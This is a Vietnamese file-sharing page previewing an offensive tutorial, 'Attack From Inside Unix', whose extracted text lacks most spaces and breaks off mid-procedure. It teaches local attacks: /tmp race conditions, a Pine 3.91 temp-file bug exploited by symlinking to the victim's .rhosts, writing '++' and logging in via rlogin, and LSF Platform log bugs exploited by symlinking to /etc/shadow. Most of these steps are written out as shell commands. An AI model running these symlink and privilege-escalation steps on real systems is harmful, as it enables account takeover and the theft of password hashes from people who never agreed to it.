Danh mục

Attack From Inside Unix

Số trang: 6      Loại file: doc      Dung lượng: 47.00 KB      Lượt xem: 9      Lượt tải: 0    
Hoai.2512

Phí lưu trữ: miễn phí Tải xuống file đầy đủ (6 trang) 0
Xem trước 2 trang đầu tiên của tài liệu này:

Thông tin tài liệu:

Attack From Inside là các phương pháp tấn công từ bên trong hệ thống. Hay nói một cáchkhác là bạn đang ở trong hệ thống đó và tìm cách tấn công hệ thống đó ở bên trong. Chẳnghạn như bạn đã có user ở trong hệ thống đó. Nhưng bạn cần Get Root hay tấn công gây rốIloạn hệ thống đó từ bên trong thì gọI là Attack From Inside.
Nội dung trích xuất từ tài liệu:
Attack From Inside Unix AttackFromInsideUnixtrangnàyđãđượcđọc lần AttackFromInsidelàgì? AttackFromInsidelàcácphươngpháptấncôngtừbêntronghệthống.Haynóimộtcách kháclàbạnđangởtronghệthốngđóvàtìmcáchtấncônghệthốngđóởbêntrong.Chẳng hạnnhưbạnđãcóuserởtronghệthốngđó.NhưngbạncầnGetRoothaytấncônggâyrốI loạnhệthốngđótừbêntrongthìgọIlàAttackFromInside. Bài viết này sẽ nêu qua một số cách Attack dựa vào một số sơ hở của Admin và một số phần mềm điển hình trên Unix.1)RaceConditionsAttack RaceConditions(tìnhtrạngtranhđua)==>Mộttrongnhữngcuộctấncôngphổbiếntrêncác hệthốngUnix/Linux RaceConditionsxảyrakhimộtchươngtrìnhhoặcquytrìnhxửlýnàođóthựchiệnmộtsự kiểmtra.Giữathờigianmàmộtsựkiểmtrađượclàmvàhoạtđộngđượcthựchiện,kếtquả củacuộckiểmtrađócóthểsẽphảnchiếutrạngtháicủahệthống.Hackersẽlợidụng chươngtrìnhhoặcquytrìnhnàytronglúcnóthựchiệnđặcquyền. NhữngchỗyếuđểlàmnềntảngchocáccuộctấncôngRaceEditionsthườngxuấthiện trongnhữngchươngtrìnhyêucầunhữngtậptintạmthời.NhưđoạnCodesau: #!/bin/sh TMPFILE=/tmp/foo.$$ iftestx$TMPFILE;then echotemporaryfilealreadyexists,possibleattack exit255 fi #Creatourtemporaryfile date>$TMPFILE (actualScriptgoeshere)rm$TMPFILENósẽgắngtạomộttậptintạmthờiởtrong/tmpgọilà/tmp/foo.$$==>PhảichắcchắnrằngfilenàykhôngtồntạitrướckhinóđượcCreat.Mặcdùfile/tmp/foo.$$cóthểkhôngtồntạitrướckhiđoạnCodenàyđượcthựcthi.NhưngnócóthểđượctạoratrướcnhữngCommandngàythángtạocácfileexcuteởtrước.Hiểunômnalàlàmrốiloạnhệthốngbởingàythángtạocácfile.ĐâylàcơhộichocácHacker...NếuthànhcônghọcóthểExcutecácfileorcácprogramhoặcbịthoátravớinhữngthôngbáolỗivềngàytháng.NếuScriptđượcchạynhưmộtCronJob,thìthôngbáoerrorsẽkhôngchỉđượcbáođếnmộtngười.HackercóthểtrựctiếpthửExcutecácProgramđặcquyền.Đểcáccuộctấncôngtheokiểunàycóhiệuquả.Hackercóthểtạora,gâylênmộtsựquátảitrênhệthốngbịtấncông.VớihyvọngCPUsẽchuyểnđổiqualạigiữacácquátrìnhthườngxuyênhơn==>làmquátảihaylàmngưngtrệhệthốngbịtấncông.Hiệuứngcủacáccuộctấncôngkiểunàyphụthuộcvàocácprogramdễbịtổnthươngvàcácfilecủanó(cảfiletạm).NhưđãnêuởtrêncácHackercóthểcốgắngbuộcngườidùngghiđèlênnhữngfilehệthốngbởiviệctạoracácSymlinktrướckhicácCommandvềngàythángđượcthựchiện.ChẳnghạnnhưcácVersioncũcủaGCCbịBugRaceEdition==>thìcácfiletạmở/tmpcủanósẽdễdàngbịcácHackerkhaithác.2)PineBugTrêncáchệthốngUnix/LinuxthườngcóPine.MộtchươngtrìnhMailnhỏvàtiệndụng.Pinecácphiênbản3.91thườngcóBuglàđểlạimộtlogfiletạmthờiở/tmpvớiSetModelà666.NóthườngđượcxuấthiệnkhimộtphiênPineđượchoạtđộnghaykhicómộtthưmớiởtrongInbox.BâygiờbạnbắtđầuquansáttrạngtháicácProcessbằnglệnhpsauxvàgắngquansátxemnhữngusernàođangsửdụngPine.SauđótạoSymlinkđếnfileđó.Bạnxemquavídụsau:victim(nạnnhân),you(bạn)victim@localhost#:pineyou@localhost#:psaux|greppine you17390.01.8100356pp3S19:070:00greppinevictim17320.85.72491104pp2S19:050:00pineyou@localhost#:lsal/tmp/|grepvictimrwrwrw1victimelite4Aug2619:05.302.f5a4302.f5a4==>filetạmcủapinetạothànhở/tmpyou@localhost#:psaux|greppineyou17440.01.8100356pp3S19:080:00greppineyou@localhost#:lns/home/victim/.rhosts/tmp/.302.f5a4Lạitiếptụcquansáttrạngthái:you@localhost#:psaux|greppineyou17590.01.8100356pp3S19:110:00greppinevictim17562.75.1226992pp2S19:100:00pineyou@localhost#:echo++>/tmp/.302.f5a4you@localhost#:cat/tmp/.302.f5a4++you@localhost#:rm/tmp/.302.f5a4Bâygiờchúngtarloginđếnvictimyou@localhost#:rloginlitterbox.orglvictimWOW!bâygiờbạnđãLoginthànhcôngvớiuservictim...3)LSFPlatformLSFPlatformcủahttp://www.platform.comlàmộttrongnhữngTooldùngđểquảnlýtàinguyên,ứngdụngtheodõihoạtđộngvàphântíchmộthệthốngmạngmáytínhUnix/Linux...TuynhiênmộtsốVersioncũcủaLSFcómộtsốBugkhánguyhiểm:Vulnerability #1:Vấnđềvớidefaultlogcấuhìnhmặcđịnhkhicàiđặt.HackercóthểđọcbấtcứfilenàotrênhệthốngvàdùngHardLinkđểkhaithácnó:Khicấuhìnhmặcđịnh!TấtcảcácfilelogcủaLSFđềuđượclưugiữởthưmục/tmp.BằngcáchsửdụngSymLinkcácHackercóthểđọcbấtcứfilenàotrênhệthống:lns/etc/shadow/tmp/lim.log.hostnameKhiCommandđượcphátraLSFsẽnốinhữngfilelogđến/etc/shadowvàthayđổiPermissionkhiếnmọingườicóthểđọcnó.Vulnerability#2:Vấnđềliênquanđếnsựviệcmàbấtkỳusernàocũngcóthểcóđượccácfilecấuhình.Sựviệcmànhữngusercóthểsởhữuvàtuỳbiếnnhữngfilecấuhìnhrấtnguyhiểm.HackercóthểralệnhchoLSFlàmnhữngviệcbấtngờ(dĩnhiênlàcóhạichohệthốngrồi).ThayđổiLSF_ENVDIRnhưvậynósẽhướngđếnHomeDirectorycủabạn:you@localhost#:setenvLSF_ENVDIR/my/home/youCopycácfilecấuhìnhvàoHomeDirectorycủabạn:you@localhost#:setenvLSF_ENVDIR/my/home/youThayđổinộidung/my/home/dir/lsf.conf:LSB_CMD_LOGDIR=/tmp/testLSF_LOGDIR=/tmp/testBâygiờtạo/tmp/test:you@localhost#:mkdir/tmp/testTiếpđếnSymLinkfilelogcủaLSFđến/etc/shadowyou@localhost#:lns/etc/shadow/tmp/test/bqc.log.hostname[hostnameisyourhostname]Bâygiờbạncầntiếp ...

Tài liệu được xem nhiều: